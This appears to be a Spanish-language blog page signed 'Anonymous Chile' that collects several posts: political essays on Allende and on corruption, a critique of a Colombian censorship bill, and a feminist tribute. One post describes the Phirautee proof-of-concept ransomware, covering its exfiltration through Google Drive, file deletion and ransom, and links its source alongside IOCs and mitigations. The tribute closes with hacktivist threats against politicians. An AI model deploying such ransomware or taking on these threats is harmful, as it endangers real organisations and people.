El régimen de Allende hizo algunas de estas cosas. Si pudo haber hecho más, dadas las circunstancias, es materia de discusión; pero parece haber sido menos capaz o haber estado menos dispuesto a abordar el problema más difícil, el de los militares. Por el contrario, parece que hubiese buscado comprar el apoyo y la buena voluntad de estos a través de concesiones y conciliación, incluso hasta la hora del golpe, a pesar de la cada vez mayor evidencia de hostilidad por parte de las Fuerzas Armadas.

En un discurso el 8 de julio de 1973, y al que me referí en el comienzo de este artículo, Luis Corvalán observaba: “algunos reaccionarios han comenzado a buscar nuevas formas de lanzar una cuña entre el pueblo y las Fuerzas Armadas, sosteniendo que estamos intentando reemplazar al Ejército profesional. ¡No, señores! Continuamos apoyando el carácter absolutamente profesional de nuestras instituciones armadas. Sus enemigos no están en las filas del pueblo sino en el campo reaccionario”.

Es una pena que los militares no compartieran esta visión: uno de sus primeros actos después de tomar el poder fue liberar a los fascistas de Patria y Libertad que tardíamente habían sido puestos en prisión por el gobierno de Allende. Declaraciones similares, expresando confianza en la mentalidad constitucionalista de las Fuerzas Armadas, fueron frecuentes entre los líderes de la coalición, y el mismo Allende.

Por supuesto, ni ellos ni Corvalán albergaban muchas ilusiones acerca del apoyo que podían esperar de los militares; pero pareciera, sin embargo, que la mayoría pensaba que podrían ganárselos; y que lo que Allende temía no sería algo así como un golpe en el clásico patrón latinoamericano, sino la “guerra civil”.

Régis Debray ha escrito –por su conocimiento de primera mano– que Allende sentía un rechazo visceral por la guerra civil; y lo primero que hay que decir sobre esto es que solo las personas moral y políticamente lisiadas en sus sensibilidades podrían burlarse de este “rechazo” o considerarlo poco noble.

Sin embargo, esto no agota el tema.

Hay diferentes maneras de tratar de evitar una guerra civil, y puede haber ocasiones en las que uno no pueda hacerlo y sobrevivir. Debray también escribe (y su lenguaje es en sí mismo interesante) que “él [Allende] no se dejaba embaucar por la fraseología del ‘poder popular’ y no quería cargar con la responsabilidad de miles de muertes inútiles: la sangre de otros le horrorizaba. Por eso es que no quiso escuchar a su partido, el Partido Socialista, que lo acusaba de maniobras inútiles y que lo presionaba a tomar la ofensiva”.

Sería útil saber si el mismo Debray cree que el “poder popular” es necesariamente una fraseología por la que uno no debería dejarse “embaucar”; y qué es lo que se entendía por “tomar la ofensiva”. Pero, en cualquier caso, el “rechazo visceral” de Allende a la guerra civil, como lo deja en claro Debray, era solo una parte del argumento de conciliación y compromiso; la otra era un profundo escepticismo ante cualquier otra alternativa. La explicación de Debray de las razones que se discutían en las últimas semanas antes del golpe tiene un párrafo revelador:

“¿Desarmar a los conspiradores? ¿Con qué?”, respondía Allende. “Denme primero las fuerzas para hacerlo.” “Movilícelas”, se le decía desde todos lados. Porque es cierto que él estaba en las alturas, en las superestructuras, dejando a las masas sin orientaciones ideológicas o dirección política. “Solo la acción directa de las masas detendrá el golpe de Estado.” “¿Y cuántas masas se necesitan para parar un tanque?”, respondía Allende.

Aparte de si concordamos o no con que Allende estaba “en las alturas, en las superestructuras”, esta clase de diálogo tiene algo de verdad; y puede ayudar mucho a explicar los acontecimientos en Chile.

Considerando la forma en que murió Salvador Allende, se justifica una cierta reticencia. Pero es imposible no atribuirle por lo menos algo de responsabilidad por lo que finalmente ocurrió. En el texto que acabo de citar, Debray también nos dice que uno de los colaboradores más cercanos de Allende, Carlos Altamirano, secretario general del Partido Socialista, le había dicho, con rabia, hablando de las maniobras de Allende, que “la mejor manera de precipitar una confrontación y de hacerla incluso más sangrienta es darle la espalda”.

Había otros cercanos a Allende que desde hacía tiempo compartían el mismo punto de vista. Pero, como Marcel Niedergang ha señalado, todos ellos “respetaban a Allende, el centro de gravedad y el verdadero ‘dueño’ de la Unidad Popular”; y Allende, como sabemos, estaba absolutamente empeñado en el rumbo de la conciliación, alentado hacia ese curso por el miedo a la guerra civil y la derrota, por las divisiones en la coalición que lideraba, por las debilidades en la organización de la clase obrera chilena, por un sumamente “moderado” Partido Comunista, y así.

El problema con ese rumbo es que tenía todos los elementos de una catástrofe autocumplida. Allende creía en la conciliación porque temía el resultado de una confrontación. Pero, precisamente porque creía que la izquierda era susceptible de ser derrotada en cualquier confrontación, tuvo que proseguir con cada vez mayor desesperación su política de conciliación; y mientras más la ejercía, más crecía la seguridad y la audacia de sus oponentes.

Más aun, y decisivamente, una política de conciliación con los adversarios del régimen tenía el grave riesgo de desalentar y desmovilizar a los partidarios. “Conciliación” indica una tendencia, un impulso, una dirección, y encuentra una expresión práctica en muchos terrenos, se quiera o no.

Así, en octubre de 1972, el gobierno había conseguido que el Congreso promulgara una “ley de control de armas” que dio a los militares amplios poderes para hacer rastreos en busca de arsenales clandestinos.

En la práctica, y dado el sesgo y las inclinaciones del Ejército, muy pronto esta ley se volvió una excusa para llevar a cabo redadas militares en fábricas que eran conocidas como bastiones de la izquierda, con el claro propósito de intimidar y desmoralizar a los activistas, todo perfectamente dentro de la “legalidad”, o al menos suficientemente dentro de la “legalidad”.

Lo verdaderamente extraordinario de esta experiencia es que la política de “conciliación”, tan incondicional y desastrosamente perseguida, no causara una desmoralización temprana ni mayor en la izquierda.

Incluso hasta fines de junio de 1973, cuando tuvo lugar el fallido golpe militar conocido como el “Tanquetazo”, la voluntad popular de movilizarse en contra de los futuros golpistas fue de todas maneras mayor que en cualquier otro momento desde que Allende asumiera la Presidencia.

Probablemente fue el último momento en el que hubiera sido posible un cambio de rumbo; y además, en cierto sentido fue el momento de la verdad para el régimen: era necesario tomar una decisión. Y se tomó una decisión: concretamente, que el Presidente continuaría tratando de conciliar; y Allende siguió cediendo, una y otra vez, a las demandas de los militares.

Yo no estoy defendiendo aquí, que quede claro nuevamente, que otra estrategia hubiera tenido éxito; solo que la estrategia que se adoptó estaba destinada a fracasar. Dice Eric Hobsbawm, en el artículo ya citado: “Personalmente no creo que hubiese mucho que Allende hubiese podido hacer después de, digamos, principios de 1972 excepto hacer hora, asegurar la irreversibilidad de los grandes cambios que se había logrado concretar [¿pero cómo? –R.M.], y con suerte mantener un sistema político que le diera a la Unidad Popular una segunda oportunidad más tarde. (…) En cuanto a los últimos meses, es casi seguro que no había prácticamente nada que él pudiera hacer”.

Con toda su aparente racionalidad y sentido de realismo, el argumento es muy abstracto y además una buena receta para el suicidio.

Para empezar, uno no puede “hacer hora” si ya se han impulsado grandes transformaciones, las que han conducido a una considerable polarización; y si las fuerzas conservadoras se están desplazando de una lucha de clases a una guerra de clases. Se puede avanzar o retroceder: retroceder hacia el olvido o avanzar para hacer frente al desafío.

Tampoco sirve de nada, en tal situación, actuar desde la presunción de que no hay mucho que se pueda hacer, ya que esto significa de hecho que nada se hará para prepararse para la confrontación con las fuerzas conservadoras. Lo que deja fuera de juego la posibilidad de que la mejor forma de evitar tal confrontación –quizás la única– es precisamente prepararse para ella, y estar en la mejor forma posible para triunfar si es que efectivamente se produce.

Esta es una referencia a un artículo de J.P. Beauvais en Rouge, donde entrega un informe como testigo ocular de una de estas redadas del Ejército, el 4 de agosto de 1973, en la que un hombre fue asesinado y varios resultaron heridos en el curso de lo que equivalía a un ataque de paracaidistas en una planta textil.

Esto nos devuelve inmediatamente a la cuestión del Estado y el ejercicio del poder. Lo dije más atrás, que un cambio radical en la planta de funcionarios públicos es una tarea urgente y esencial para un gobierno inclinado hacia una transformación verdaderamente seria; y que ello necesita estar acompañado de una variedad de reformas e innovaciones institucionales diseñadas para empujar el proceso de democratización del Estado.

Pero en este último punto es mucho más lo que debe hacerse, no solo para concretar un conjunto de objetivos socialistas de larga data concernientes al ejercicio del poder socialista, sino como un medio, sea de evitar la confrontación armada o de enfrentarla en los términos más ventajosos y menos costosos si es que evitarla se vuelve imposible.

Lo que ello significa no es simplemente “movilizar a las masas” o “armar a los trabajadores”. Estos son lemas –lemas importantes, sí–, a los que se requiere dotar de contenidos institucionales efectivos.

En otras palabras, un nuevo régimen inclinado a acometer cambios fundamentales en las estructuras económica, social y política debe, desde el comienzo, empezar a construir y alentar la construcción de una red de órganos de poder, paralelos y complementarios al poder del Estado, además de constituir una sólida infraestructura para la oportuna “movilización de las masas” y la dirección efectiva de sus acciones.

Las formas que esta movilización asuma –comités de trabajadores en sus lugares de trabajo, comités cívicos en distritos y subdistritos, etc.,– y la manera en que estos órganos se engranan con el Estado pueden no ser susceptibles de planificación anticipada. Pero la necesidad está allí, y es imperativo que se satisfaga, cualesquiera sean las formas más apropiadas.

A todas luces no fue la manera en que actuó el régimen de Allende. Algunas cosas que necesitaban hacerse se hicieron; pero, tal como ocurrió la “movilización”, y sus preparativos –demasiado tardíos para una posible confrontación–, careció de dirección, de coherencia y en muchos casos incluso de valor.

Si el régimen hubiese promovido realmente la creación de una infraestructura paralela podría haber sobrevivido; y, por cierto, podría haber tenido menos problemas con sus adversarios y críticos dentro de la izquierda, por ejemplo el MIR, ya que sus miembros no se habrían visto tan impulsados a actuar por su cuenta y a desplegarse de un modo que incomodó tan enormemente al gobierno: habrían estado más dispuestos a cooperar con un régimen en cuya voluntad revolucionaria hubiesen podido confiar. En parte por lo menos, el “ultraizquierdismo” es consecuencia del “izquierdismo ultramoderado”.

Salvador Allende fue una figura noble y tuvo una muerte heroica. Pero, aunque sea difícil decirlo, ese no es el punto. No es cómo murió lo que importa finalmente, sino reflexionar sobre si pudo haber sobrevivido al promover otras políticas; y es errado afirmar que no había alternativa.

Aquí, como en muchos otros ámbitos, y en este más que en la mayoría, los hechos solo se vuelven imperiosos cuando uno permite que lo sean. Allende no fue un revolucionario que también era un político parlamentarista. Fue un parlamentarista que, lo que ya es notable, tuvo tendencias genuinamente revolucionarias. Pero estas tendencias no pudieron sobreponerse a un estilo político que no era el adecuado a los propósitos que él pretendía alcanzar.

La cuestión del rumbo no es una cuestión de coraje. Allende tuvo todo el coraje que se requería, y más. La famosa acotación de Saint Just, que tanto se ha citado desde el golpe, de que “quien hace la revolución a medias cava su propia tumba”, está cerca del blanco, pero fácilmente puede usarse en un sentido erróneo.

Existe gente en la izquierda para la que solo significa el despiadado uso del terror, y que dicen una vez más, como si acabaran de inventar la idea, que “no se puede hacer tortillas sin quebrar huevos”. Pero, como el escritor francés Claude Roy observaba hace algunos años, “puedes quebrar un montón de huevos y no lograr hacer una tortilla decente”.

El terrorismo puede llegar a ser parte de la lucha revolucionaria. Pero la cuestión esencial es el grado en que los responsables de la dirección de esa lucha son capaces y tienen la voluntad de engendrar y promover la movilización efectiva, esto es organizada, de las fuerzas populares.

Si es que hay alguna “lección” definitiva que aprender de la tragedia chilena, parece ser esta; y los partidos y movimientos que no la aprenden, y no aplican lo que han aprendido, bien pueden estar preparando nuevos Chiles para ellos.

39 comentarios

Practicando nuestros conocimientos con el ransomware Phirautee

Publicada el 21/10/2021 - 20/10/2021 por Anonymous Chile

En los últimos años, el mundo del ransomware se ha vuelto un poco loco y las organizaciones de todo el mundo están siendo atacadas, lo que provoca daños e interrupciones. Como todos sabemos, el panorama de las amenazas está cambiando rápidamente y escuchamos frecuentemente el alboroto sobre la infección de ransomware en las oficinas o leemos sobre ello en las noticias. ¿Alguna vez te has preguntado cómo los threat actors desarrollan ransomwares? ¿Qué nivel de sofisticación y comprensión se requiere para atacar a una organización?

Viral Maniar presentó en la conferencia DEFCON 28 Safe Mode Phirautee, un ransomware a modo de prueba de concepto que nos ayudará a difundir y mejorar la conciencia de nuestros usuarios sobre los ataques y las implicaciones del ransomware. Esta herramienta roba la información y mantiene los datos de una organización retenidos para pagos o los cifra/borra permanentemente.

Características

  • Phirautee está escrito exclusivamente con PowerShell y no requiere librerías de terceros.
  • La herramienta utiliza comandos Living off the Land (LotL) y criptografía de clave pública para cifrar los datos en el disco y filtrar archivos grandes a través de Google Drive.
  • Antes de cifrar, extrae los archivos de la red de la víctima y, una vez que los archivos están cifrados y exfiltrados, los archivos originales se eliminan permanentemente del host para finalmente exigir un rescate.
  • El ransom solicita un pago de 0.10 BTC (USD $1000, aproximadamente).

Detección

  • La extensión de archivo de los archivos cifrados se cambia a «.phirautee»
  • El fondo de escritorio del host comprometido se cambia con el fondo Phirautee
  • El escritorio tendrá el archivo Phirautee.txt

Estrategias de mitigación

  • Segmentación de la red y detección de movimiento lateral. Seguir el principio de acceso con privilegios mínimos o restringir el acceso a servidores confidenciales. Utilizar MFA en todos los portales importantes.
  • Deshabilitar PowerShell para usuarios de dominio estándar y realizar listas blancas de aplicaciones.
  • Copias de seguridad frecuentes en toda la red (si es posible sin conexión).
  • Aplicar parches y tener un programa de gestión de vulnerabilidades.
  • Tener un equipo de respuesta a incidentes dedicado y desarrollar un plan para eventos de ransomware.
  • Invertir en un buen producto IDS/IPS/EDR/AV/CASB.
  • Validar la efectividad de sus herramientas y tecnologías de defensa a través de ejercicios ofensivos preaprobados.
  • Organizar sesiones de formación sobre phishing y educación de usuarios para sus empleados.
  • Tener un seguro ciber para ayudar a cubrir los costes en caso de que deba pagar el rescate. Además, revisar las pólizas de seguro para asegurarse de que no haya agujeros.
  • Obtener ayuda de los feds locales para las claves de descifrado.

IOCs

Rutas:
C:\temp\cert.cer
c:\temp\sys.txt
c:\temp\backup.zip
c:\temp\sys1.txt
c:\temp\steal.zip
C:\users\$env:USERNAME\PhirauteeBackground-3.jpg

MD5s:
77EA9D33D144072F7B35C10691124D16
4E123FF3A7833F0C8AC6F749D337444D

Dominios usados para exfiltrar:
https://smtp.pokemail.net
https://www.googleapis.com
https://accounts.google.com
https://raw.githubusercontent.com

Registro:
HKCU:\Control Panel\Desktop

Proyecto en Github: https://github.com/Viralmaniar/Phirautee
Presentación DEFCON: https://speakerdeck.com/viralmaniar/phirautee-defcon28-writing-ransomware-using-living-off-the-land-lotl-tactics

25 comentarios

¿Es la censura de contenidos una protección efectiva para la niñez y la adolescencia?

Publicada el 21/10/2021 - 20/10/2021 por Anonymous Chile

La discusión en Colombia de un proyecto de ley para la protección de niños, niñas y adolescentes es otro capítulo de intentos desmedidos por proteger derechos amenazando internet.

El proyecto de ley 600 de 2021 fue presentado por el Ministerio de Tecnologías de la Información y las Comunicaciones y aprobado en primer debate en comisión de la Cámara de Representantes de Colombia. Declara tener por objeto la regulación de las responsabilidades especiales de los medios de comunicación frente a los derechos de la niñez, la infancia y la adolescencia. Como se ha reiterado en varias ocasiones, se trata de una deuda del Estado colombiano con la implementación de una orden de su Corte Constitucional.

El PL 600 propone la adopción de mecanismos destinados a prevenir la producción y difusión de contenidos que atenten contra los derechos de NNA, tanto en medios de comunicación masiva como en internet. Establece un conjunto de obligaciones para los medios, además de un régimen sancionatorio aplicable en caso de materializarse un presunto comportamiento reprochable respecto de cualquiera de las medidas incorporadas al ordenamiento a través del referido proyecto de ley.

Aunque en principio el objetivo sea loable, es necesario hacer un acercamiento al contenido de tal normativa, con el fin de evaluar si en el afán de alcanzar el objetivo declarado no se están poniendo en riesgo derechos fundamentales de terceros, que ya han sido advertidos.

El contenido preocupante del PL 600

En el capítulo IV el proyecto crearía una comisión de expertos, compuesta por personas de distinta índole y pericias, entre cuyas funciones está la de proponer “iniciativas técnicas y administrativas sobre sistemas o mecanismos de detección, control parental, filtro y clasificación de contenidos”. Para ello, se elaborará un catálogo de contenidos “que pueden atentar contra la integridad psíquica, física de la niñez o adolescencia o derechos preestablecidos en la Constitución y ley, mediante el acceso, uso y aprovechamiento del internet” (Art. 13).

A los proveedores de servicios de internet (PSI), pobremente definidos en la ley para cubrir desde conexión hasta plataformas en línea, les aplican las disposiciones referentes a “Deberes” y “Medidas Técnicas” que deben cumplir, que incluyen el bloqueo y filtrado de contenidos (Art. 15.4 y 16.2) bajo la amenaza de incurrir en infracciones y recibir las sanciones descritas en el Capítulo V. Esta disposición traslada a los PSI la responsabilidad por el contenido de terceros que sea considerado infractor, lo que a la larga constituye una forma de censura previa.

Todas estas disposiciones resultan problemáticas ya que chocan con el derecho a la libertad de expresión, pues dichos artículos limitan contenidos sin estar en armonía con las condiciones establecidas en la Convención Americana sobre Derechos Humanos. Atentan a la vez con el principio de neutralidad de la red, por pretender la imposición de barreras a la libre circulación de expresiones en línea; afectan también a la garantía del debido proceso, por establecer una medida restrictiva de derechos fundamentales, como es el bloqueo de contenido, sin proceso previo ni orden judicial.

Nuevos riesgos para la libertad de expresión en línea

Tal como miembros de la academia, el sector privado y la sociedad civil han hecho ver en reuniones cerradas y audiencias públicas frente al Ministerio TIC y el Congreso de Colombia, un derecho especialmente afectado es la libertad de expresión, en los términos del Art. 20 de la Constitución de Colombia y el Art. 13 de la Convención Americana sobre Derechos Humanos, incluyendo a la libertad de buscar, recibir y difundir informaciones e ideas de toda índole. Como sabemos, no es un derecho absoluto y está sujeto a limitaciones.

La jurisprudencia interamericana desarrolló un test para fijar ese marco de limitaciones legítimas, que deben cumplirse todas: 1) haber sido definida en forma precisa y clara a través de una ley formal y material; 2) estar orientada al logro de objetivos imperiosos autorizados por la Convención; y 3) debe ser necesaria en una sociedad democrática para el logro de los fines imperiosos que se buscan; estrictamente proporcionada a la finalidad perseguida.

Dentro de ese marco, aquellas disposiciones del PL 600 que establecen bloqueos y filtro de contenidos representan la implementación de mecanismos de censura previa, prohibido por la Convención Americana, en tanto constituyen medidas de control preventivo y no responsabilidades posteriores a quienes abusen de ese derecho. Además, se trata un mecanismo amplio, no restringido a las hipótesis de limitaciones legítimas, como cuando se trata de contenidos abiertamente ilícitos y aquellos discursos que no están resguardados bajo la protección del derecho a la libertad de expresión, como la propaganda de la guerra y la apología del odio, la incitación directa y pública al genocidio, y el contenido de explotación sexual a NNA.

Incluso si el PL 600 estableciera solo responsabilidades ulteriores, habría que analizar si las limitaciones a este derecho cumplen con el test mencionado. En este caso, pueden señalarse dos puntos que resultan problemáticos para cumplir con el primer requisito. Por un lado, las causas para limitar contenidos que se encuentran en forma de catálogo, son ambiguas y podrían permitir una interpretación arbitraria de la autoridad, incumpliendo el paso de legalidad estricta del test (Art. 13 del PL 600). Por otro lado, está sujeto a sanciones que, además de afectar a intermediarios de comunicaciones, condiciona su acción y traslada a ellos responsabilidad por el ejercicio de la censura.

Sobre el cumplimiento del requisito de necesidad dentro del test tripartito, no puede asegurarse que las disposiciones del PL 600 tengan por fin cualquiera de los objetivos enumerados que ha desarrollado la jurisprudencia interamericana. Tampoco puede señalarse que las disposiciones que pretenden bloquear o filtrar contenidos contra la integridad psíquica, física de NNA o sus derechos preestablecidos en la Constitución y ley, sean necesarios, idóneos y proporcionales, ni siquiera para ese fin.

¿Qué va a pasar con el PL 600?

La iniciativa parece estar interrumpida debido al escándalo por irregularidades contractuales que hoy envuelve al Ministerio TIC, lo que resta su peso en impulsar proyectos como el PL 600.

Esperamos que el debate sobre la conveniencia de proyectos de ley que apunten a la protección de los derechos de NNA continúe y se profundice, no sólo en Colombia sino a nivel regional. La finalidad es obtener mejores insumos que permitan una normativa respetuosa de los derechos fundamentales, sin buscar soluciones en la restricción de la circulación de contenidos en internet.

Este caso un comienzo de una conversación que nos desafía para el genuino resguardo de todos los derechos de las nuevas generaciones de internautas.

115 comentarios

Por las ausentes: una dedicatoria a todas las mujeres asesinadas por el estado fascista y neoliberal de Chile

Publicada el 18/10/2021 - 19/10/2021 por Anonymous Chile

«Siempre se pide un minuto de silencio y yo hoy quiero pedir no un minuto, el tiempo que queramos para no estar en silencio, vamos a gritar porque ya hemos estado mucho tiempo en silencio… Quiero que gritemos por todas nuestras hermanas asesinadas, por todas nuestras hermanas desaparecidas, por todas nuestras compañeras violentadas. Vamos a gritar fuerte para que nos escuche nuestro presidente y en todo el mundo. Vamos a gritar fuerte todas, que nos escuche el mundo»
Mon Laferte – México, día de la mujer (8 de Marzo, 2020)

Citando a la icónica, popular y reconocida cantautora chilena Mon Laferte, transcurridos 2 años del estallido social, dedicamos un humilde, honesto y sincero homenaje, como un grito de lucha, por todas aquellas mujeres que han sido asesinadas, menospreciadas, abusadas o maltratadas de cualquier forma por el patriarcado, el sistema y las fuerzas de represión capitalistas y neoliberales del Estado de Chile

El dominio del patriarcado constituye la marca oscura de una lucha atávica, por medio de la cual la mujer intenta conquistar su independencia -cada vez con mejores armas- y construir una vida de libertad.

Este eterno enfrentamiento no trata de costumbres ni tradiciones, sino de una guerra de guerrillas librada por un sector de la población -premunido de toda clase de armas: legales, físicas y doctrinarias- contra otro que solo posee la certeza de su razón. Y así han transcurrido los siglos.

Para empezar a comprender la dimensión de este sistema de dominación, es preciso ir más allá de las apariencias y medir el enorme impacto sobre la vida de más de la mitad de la población del planeta. Esto no solo se traduce en una violencia aparente en el maltrato físico, social y psicológico, cuya constante presencia impide el desarrollo pleno de niñas, adolescentes y mujeres adultas, sino también en la manera solapada como se las condena a la dependencia económica gracias a la influencia nefasta de una visión de maternidad y de familia, distorsionada y marcada por una autoridad ilegítima.

A partir de un esquema de injusticia histórica de tal magnitud, se comprende la manera cómo las sociedades toleran el abuso, la tortura, la marginación y la crueldad extrema en contra de las mujeres por el solo hecho de serlo.

Basta echar una mirada a las estadísticas en donde se refleja de manera transparente cuán frágil es su estatus y de qué modo se le impide alcanzar un pleno dominio sobre su vida y su cuerpo. En países sumidos en el subdesarrollo, esta realidad es abrumadora y estampa una visión aberrante de lo femenino como débil -física e intelectualmente- y naturalmente subordinado, tanto desde lo jurídico como desde las doctrinas religiosas.

De ahí que cada intento por avanzar y despejar el camino hacia el desarrollo pleno del sector femenino haya encontrado los mayores obstáculos, incluso desde su propio ámbito.

El hecho de que, al haberse visto en la necesidad de conquistar cada pedazo de libertad con la ruptura -muchas veces violenta- de los obstáculos religiosos, sociales y legales para ocupar un sitio en el mundo real haya sido objeto de burla, rechazo y condena, es motivo suficiente para reflexionar sobre esta absurda estructura del poder.

En los ámbitos domésticos, laborales y sociales, la mujer todavía ocupa un espacio sujeto a la condescendencia y a la corrección política y no al pleno derecho.

Este retrato no obedece a una visión distorsionada de la realidad. Es un hecho patente en las aberrantes cifras de feminicidios, secuestros, desapariciones, tráfico y violaciones contra niñas, adolescentes y mujeres, crímenes impunes que pocas veces -o casi nunca- llegan a la etapa de investigación y condena.

Ellas son las ausentes en sociedades indiferentes a su condición de seres humanos, con todo lo que ello implica en respeto, autonomía y capacidades. Ellas son quienes han experimentado en carne propia el desprecio de sus pares y el abandono de la sociedad.

En el trasfondo de este drama de injusticias está la eterna lucha por el poder. De ella se desprende la enorme maquinaria del patriarcado, cuya preeminencia descansa sobre una autoridad impuesta por la fuerza y las enormes ventajas de tener a su disposición a todo un contingente de mujeres capaces de aportar, por la fuerza de la tradición, su trabajo no remunerado, su riqueza creativa y su inacabable resistencia al dolor. La lucha por reivindicar sus derechos enfrenta -por obvias razones- una feroz resistencia.

El lugar de la mujer en la sociedad es, todavía, un tema pendiente, y tanto Anonymiss como Anonymous Chile no descansaremos hasta revindicar los derechos y el respeto por todas y cada una de las mujeres de Chile y el mundo, otorgándoles el poder y la autonomía que merecen fuera del yugo del patriarcado y el Estado capitalista neoliberal chileno que en lugar de escuchar las demandas de su pueblo prefiere reprimir con violencia, asesinato, tortura y genocidio contra personas inocentes que solamente exigen justicia, libertad y dignidad.

El día de ayer, hoy y siempre,
Somos Anonymiss
Somos Anonymous
Somos la revolución
Somos el pueblo
Somos todxs
Somos legión
No perdonamos
No olvidamos
Gobernantes y políticos de Chile y el mundo, no nos esperen porque estamos aquí. No intenten correr porque los alcanzaremos. No intenten ocultarse porque donde sea los encontraremos y la verdad saldrá a la luz porque solamente la verdad nos hará libres asentando una lucha revolucionaria sólida y próspera. Pero no se equivoquen, esto no se trata de Anonymous. Como todxs saben, Anonymous no es un grupo, una sociedad, una orgenización, sino que es solamente un símbolo, una idea, un pensamiento de lucha por la justicia, la libertad y la verdad. Entonces, si pretenden llamar al CSIRT, la ANI y la PDI para buscarnos, ya empiezan mal porque para encontrar al quién primero deberían buscar el qué. ¿Qué ocasionó que lleguemos a las presentes circunstancias que nos convocan? Esa es la pregunta que deberían hacerse y solamente podrán contestarla mirándose al espejo.

38 comentarios

Los orígenes de la corrupción

Publicada el 18/10/2021 - 18/10/2021 por Anonymous Chile

Una referencia necesaria

Corrupción es un sustantivo. Femenino. Es el acto de corromper. Corromper, por su parte, es descomponer las partes de un cuerpo, separarlas, a fin de conseguir la destrucción de su estructura primitiva. Por analogía, se aplica a otras disciplinas como lo son la política y las ciencias sociales. En estos últimos casos, la referencia se hace a prácticas que llevan al cuerpo social, o a las instituciones que existen, a su descomposición y, en consecuencia, a su eventual extinción. Su influencia es tan perniciosa que un autor tan prestigioso como, lo fuera y sigue siendo, el escritor ruso Nicolai Gogol, en una de sus obras, advierte:

«[…] lo importante es que nos incumbe salvar a la patria, que la patria se halla en peligro, no por la invasión de veinte razas extranjeras, sino por nosotros mismos».

No es la corrupción un fenómeno nuevo, por lo que hace suponer a muchas personas corrientes —e, incluso, académicos—, que se trata de una impronta natural, estampada a fuego en el alma humana. Como parece estimarlo el abogado Luis Sergio Bates Hidalgo, ex ministro de Justicia bajo el gobierno de Ricardo Lagos, ex presidente del Consejo de Defensa del Estado y hombre de la más absoluta confianza de la antigua alianza Concertación de Partidos Por la Democracia.

Casualmente, días después que el brillante académico diera a conocer públicamente su poco cuidadosa tesis al respecto, nuestro buen amigo Hugo Latorre, en un artículo que publicara el periódico ‘El Clarín’, también tuvo oportunidad a referirse al tema trayendo a colación la obra del escritor ruso Nicolas Gogol ‘Almas muertas’, en donde, entre otras cosas, se pueden leer los siguientes párrafos:

«Estoy convencido de que la corrupción no puede extirparse por ningún medio, ni por el terror ni por los castigos, que tiene raíces muy hondas. La costumbre deshonrosa de aceptar sobornos se ha hecho necesaria e inevitable, aún para aquellos que no son de natural corruptos. Sé que para muchos es poco menos que imposible oponerse a la tendencia general. Pero ahora es mi deber, como en momento decisivo y sagrado, cuando nos corresponde salvar a la patria, cuando todo ciudadano ha de aguantar todas las cargas y hacer todos los sacrificios, es mi deber ahora apelar a la conciencia de aquellos de vosotros que todavía conservéis un corazón ruso y alguna noción del significado de la palabra honor […]»

Introduciéndonos en la raíz del fenómeno

Es un hecho indiscutible que el fenómeno de la corrupción se ha extendido a lo largo y ancho del planeta, especialmente, luego de la instalación del modelo de economía social de mercado. Lo cual no quiere decir que antes no existiera. La corrupción siempre ha estado presente en la historia; los modos de producción que se han sucedido a través de los siglos, la generalidad de ellos modos de dominación, así lo han determinado. Y bajo la forma de acumulación impuesta desde 1990, en adelante, ha experimentado un notable desarrollo. Especialmente, en la nación chilena que fue la exportadora de ese modelo.

Pero, si así ha sucedido, ¿a qué se debe todo ello? ¿Tiene razón Bates cuando afirma que la corrupción es parte de la esencia del ser humano? ¿Cuáles son sus orígenes?

Nuestra opinión es que, para encontrar las raíces de la corrupción, hay que intentar proveerse, previamente, de un instrumental teórico que ayude en tal empeño. Y nos parece muy apropiado recurrir a las ideas y propuestas hecha por ese gran intelectual que fuera Arthur Koestler, para quien cada persona conlleva consigo dos tendencias fundamentales que determinan su existencia; tales son la ‘autoafirmante’ y la ‘integradora’.

La primera de esas tendencias, la ‘autoafirmante’, es la que permite al individuo perseverar en sí, la que lo conduce por la senda de la búsqueda de su propia identidad. Corresponde, en el fondo, a lo que Carl C. Jung llamó ‘proceso de individuación’, es decir el proceso aquel en virtud del cual el individuo se hace cada vez más él mismo, acentúa sus rasgos, apetencias, aptitudes, cualidades y calidades. La tendencia integradora, por el contrario, es la que le hace ser parte de una comunidad, le hace incorporarse a una estirpe o especie cuya pertenencia necesita para desarrollarse y vivir y a la que le resulta imposible dejar de abandonar. Por consiguiente, el comportamiento óptimo de ese individuo no puede ser sino el equilibrio que pueda lograr en el desarrollo de ambas tendencias. Y su anormalidad, el correspondiente desequilibrio de aquellas, el crecimiento desmesurado de una por sobre la otra, y el absoluto predominio de aquella que se impone sobre ésta. En estricta teoría.

Tenemos, así, un basamento sobre el cual podemos asentar otras contribuciones teóricas al respecto.

Sin embargo, el problema radica en que ambas tendencias no se desarrollan en un ambiente aislado, en una probeta o en un tubo de ensayo, sino en la vida social que el individuo lleva, que no es sino su práctica o interacción social. Es ahí donde surgen las dificultades, pues el predominio entre una y otra tendencia no está resuelto sino, por el contrario, necesita resolverse; y tal resolución, necesariamente, ha de ser social. La disputa por imponer los intereses propios comienza; y comienza también la disputa por apartar los ajenos. Estamos al interior de un modo de producción que es, a la vez, modo de dominación que se reproduce día a día. Hay clases sociales y fracciones de clases que, igualmente, se van a reproducir. Una ha de imponerse por sobre las otras para ejercer la dominación. Hay, por ende, autoridades y, consecuencialmente, autoritarismo. Reproduciéndose constantemente. La reproducción social se llama costumbre. Y la costumbre crea cultura, que no es sino la forma de relacionarnos unos con otros, que, por lo mismo, no es sino una cultura autoritaria.

C=(A+D)-FC

Las ciencias sociales han adoptado, para sí, la misma mala costumbre que muestra la economía: aplicar la metodología matemática para estudiar los fenómenos, práctica que es aconsejable para muchos casos pero no para todos.

Por lo mismo, no debe sorprender que se recurra a elaborar una especie de fórmula para describir correctamente la esencia de la corrupción. A esa elaboración se acostumbra considerar como ‘causas’ de la misma, desconociéndose los aportes de Aristóteles al respecto. Por lo mismo, no es extraño escuchar que alguien, tratándose de esa materia, musite, en voz baja, una propuesta según la cual C=(A+D)-FC, en donde C es corrupción, A es autoritarismo, D es discrecionalidad y FC es Falta de Control o, lo que, en otras partes, se presenta como ‘T’, de transparencia.

El problema radica en determinar si es posible compatibilizar las investigaciones de Koestler con la fórmula antedicha y tratar de entender el fenómeno en su real magnitud.

Los efectos del autoritarismo

De la fórmula antedicha, la ‘A’ representa el autoritarismo que, sin lugar a dudas, permite la imposición de la corrupción como forma de vida. Pero este factor no lo hace per se. Requiere de otros para reproducirse y propagarse dentro de la sociedad. Esos otros elementos no son sino, de acuerdo a la fórmula, discrecionalidad y falta de control.

